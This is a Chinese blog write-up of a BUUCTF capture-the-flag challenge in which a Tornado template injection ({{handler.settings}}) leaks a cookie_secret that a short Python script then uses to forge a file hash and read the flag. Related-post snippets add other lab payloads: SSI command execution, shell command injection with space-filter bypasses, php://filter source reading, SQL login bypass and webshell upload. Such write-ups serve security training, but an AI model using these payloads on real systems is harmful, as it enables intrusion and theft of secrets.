buuctf-web-[护网杯 2018]easy_tornado-wp

最新推荐文章于 2022-04-10 00:42:20 发布
最新推荐文章于 2022-04-10 00:42:20 发布
阅读量255 收藏
点赞数
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.csdn.net/weixin_46439278/article/details/118670937
版权
"本文介绍了如何通过Python模板注入(SSTI)来解决护网杯2018中easy_tornado挑战。文章详细阐述了利用Tornado框架的模板渲染功能,寻找cookie_secret的过程,包括通过error消息发现模板注入,利用{{handler.settings}
摘要由CSDN通过智能技术生成

[护网杯 2018]easy_tornado

知识点

  • Python模板注入(ssti)

过程

根据题目名称tornado,搜索一番,发现tornado是一个Python的模板

welcome.txt提示render,经过查询render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。

主页:

三个文件中分别提示的内容为

  • flag in /fllllllllllllag
  • render
  • md5(cookie_secret+md5(filename))

然后抓个包

不难发现,在file文件下,传入了两个get型的参数,filename和filehash,为了得到flag,filename肯定传入/fllllllllllllag,而filehash需要根据md5(cookie_secret+md5(filename))找出对应的cookie_secret,所以我们重点是放在**找cookie_secret**上

修改请求行中的filename,发现提示

访问提示页面/error?msg=Error

存在模板注入,之后进行各种尝试与资料获取发现对于tornado框架存在附属文件handler.settings,于是尝试输入/error?msg={{handler.settings}}

发现 ‘cookie_secret’:

计算filehash值

import hashlib
hash = hashlib.md5()

filename='/fllllllllllllag'
cookie_secret="3799aef2-cdfe-4c5d-ae04-47b3723689a0"
hash.update(filename.encode('utf-8'))
s1=hash.hexdigest()
hash = hashlib.md5()
hash.update((cookie_secret+s1).encode('utf-8'))
print(hash.hexdigest())

url传入

/file?filename=/fllllllllllllag&filehash=7828f14055747177adf201166beddeda

居上7788
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[护网 2018]easy_tornado
夜幕下的灯火阑珊的博客
05-11 550
知识点 ssti handler.settings 题目如图所示 依次点开得到 同时在URL中可以看到 file?filename=/hints.txt&filehash=8590dfced9b10ac7d05a1c291e590312 说明要读取/fllllllllllllag,还需要相关的hash值,根据hints.txt得知这里为cookie_secret 尝试filename=/fllllllllllllag得到 尝试模板注入msg={{7*7}}得到ORZ,说明不存在这个运
[护网 2018]easy_tornado 1
shinygod的博客
01-29 2977
考点: 1、SSTI(务器端模板注入) 2、模板中的Handler 做之前先全点一遍看看里面有啥 flag.txt: 看到一个fllllllllllllag,正好有个filename参数,带进去看看: 好吧,我想多了。。 再看一下第二个文件:welcome.txt 它提示了一个单词:render,题目中也告诉了我们是tornado,所以想到SSTI,但想到了是一回事,会不会做又是另一回事,=_=,咱先不着急,先把第三个文件看完:hints.txt 这玩意应该就是filehash的参数了,filen
buuojweb刷题wp详解及知识整理—-【护网easy_tornado(模板注入+md5)
01-20
自己走过的路加wp辅助 信息收集加思路推理 点击一下/welcome.txt 回显 render 而且url处有异常 同理测试其他选项 通过猜测可知filehash的值就是/hint.txt中的算法得到的 从而 我们只要得到cookie_secret的值即可通过...
BUUCTF-easy_tornado
wuerror的博客
07-07 3655
这题是2018护网原题的复现。 进去之后显示三个txt,每个点进去看看。内容如下: /flag.txt flag in /fllllllllllllag /welcome.txt render /hints.txt md5(cookie_secret+md5(filename)) 看看url,发现web9.buuoj.cn/file?filename=/flag.txt&fil...
BUUCTF-模板注入专项刷题
m0_51563147的博客
02-27 3417
SSTI: 目录 简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin码命令执行,但是题目过滤的不够严格导致.
[护网 2018]easy_tornado WriteUp(超级详细!)
lunan的博客
04-22 3506
[护网 2018]easy_tornado   打开题目后,首先发现3个超链接   依次点开三个链接    网址里有参数filename和filehash推测这里flag应该是 filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(filename))里面,filehash里hash就是提示为md5的hash加密。    变量 filename 的值总是为要访问的文件,再根据提示三和 fil
文件上传之黑名单验证绕过
weixin_34187822的博客
09-15 685
当做代码的审计或者文件搞渗文章上传的时候有时候会遇到黑名单的验证码,比如常规的一些脚本名asp php jsp这种的不允许上传,下面是我总结的一些绕过的方法Shtml<!--#includefile="/home/www/user8534/nav_foot.htm"--> //可以用来读文件<!--#exec cmd="ifconfig"--> //可...
buuctf-web-[ACTF2020 新生赛]Exec-wp
居上
06-25 191
[ACTF2020 新生赛]Exec 知识点 命令执行 过程 主页面: 这里是存在命令执行漏洞的,我们尝试去使用;执行命令 127.0.0.1;cat /flag
buuctf-web-[ACTF2020 新生赛]Include-wp
居上
06-22 184
[ACTF2020 新生赛]Include 知识点 php://filter 伪协议文件包含读取源代码,加上read=convert.base64-encode,用base64编码输出,不然会直接当做php代码执行,看不到源代码内容。 过程 主页: 有个get型的参数,可以看到传入flag.php,这里是一个文件包含,但是无法查看php脚本的详细内容 payload ?file=php://filter/read=convert.base64-encode/resource=flag.php .
BUUCTF web wp
vegetable223的博客
11-28 400
BUUCTF-web warmup wp 首先认真阅读题目,一般题目信息有提示,有些还会有隐藏信息 题目名是“warm up”,热身?,看来没什么用。下面有提示我们这一题的主要知识点是php和代码审计,淦!发现都没学过,不过不要紧,不会我们可以百度啊!!! 打开链接 看到一张滑稽的表情,肯定不简单,直接f12查看源代码 下面展示一些 内联代码片。 <!DOCTYPE html> <html lang="en"> <head> <meta charset=
buuctf-web-[ACTF2020 新生赛]BackupFile-wp
居上
07-17 229
[ACTF2020 新生赛]BackupFile 知识点 备份文件泄露 php中的弱类型比较 过程 使用扫描软件扫一下目录,扫到/index.php.bak <?php include_once "flag.php"; if(isset($_GET['key'])) { $key = $_GET['key']; if(!is_numeric($key)) { exit("Just num!"); } $key = intval($key);
buuctf web wp
qq_63267612的博客
04-10 532
文章目录[极客大挑战 2019]EasySQL [极客大挑战 2019]EasySQL 打开后是一个登录框,直接尝试万能密码 (用户名:1’ or 1=1 # 密码:随便输) 登录得到flag 这里的万能密码是为什么呢? 数据库中的查询语句: select id from users where username = '' or 1=1-- and password = '456' 又 这里呢1=1永远为真,后面 and password = '456’被注释掉了。数据库不需要考虑,这里我们就跳
buuctf-web-[极客大挑战 2019]Upload-wp
居上
07-12 233
[极客大挑战 2019]Upload 知识点 上传phtml文件 嵌在script标签中的一句话木马 content-type的修改 请求体中的添加文件头 过程 主页就是上传点,先上传一个正常的shell.php文件 发现只能上传image,bp抓包依次尝试文件后缀名修改,content-type修改、文件名%00截断,添加文件头都失败 然后更改文件名为xx.phtml,,phtml是嵌入了php代码的html文件,尝试上传,请求体中的内容仍然是普通的一句话木马文件 检测到<?请求体中的内
buuctf-web-[极客大挑战 2019]Knife-wp
居上
06-28 180
[极客大挑战 2019]Knife 知识点 蚁剑或者中国菜刀等工具的使用 过程 主页: 直接给出这个主页就是一句话木马 蚁剑连接,根目录查看到flag
buuctf-web-[GXYCTF2019]Ping Ping Ping-wp
居上
06-27 240
[GXYCTF2019]Ping Ping Ping 知识点 变量拼接 sh,bash下编码 绕过空格过滤 绕过关键字过滤 过程 主页: ?ip=127.0.0.1 ?ip=127.0.0.1;ls ?ip=127.0.0.1;cat flag.php 过滤了空格,使用$IFS$1来绕过 ?ip=127.0.0.1;cat$IFS$1flag.php 过滤了flag,但是可以查看下index.php ?ip=127.0.0.1;cat$IFS$1index.php |
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值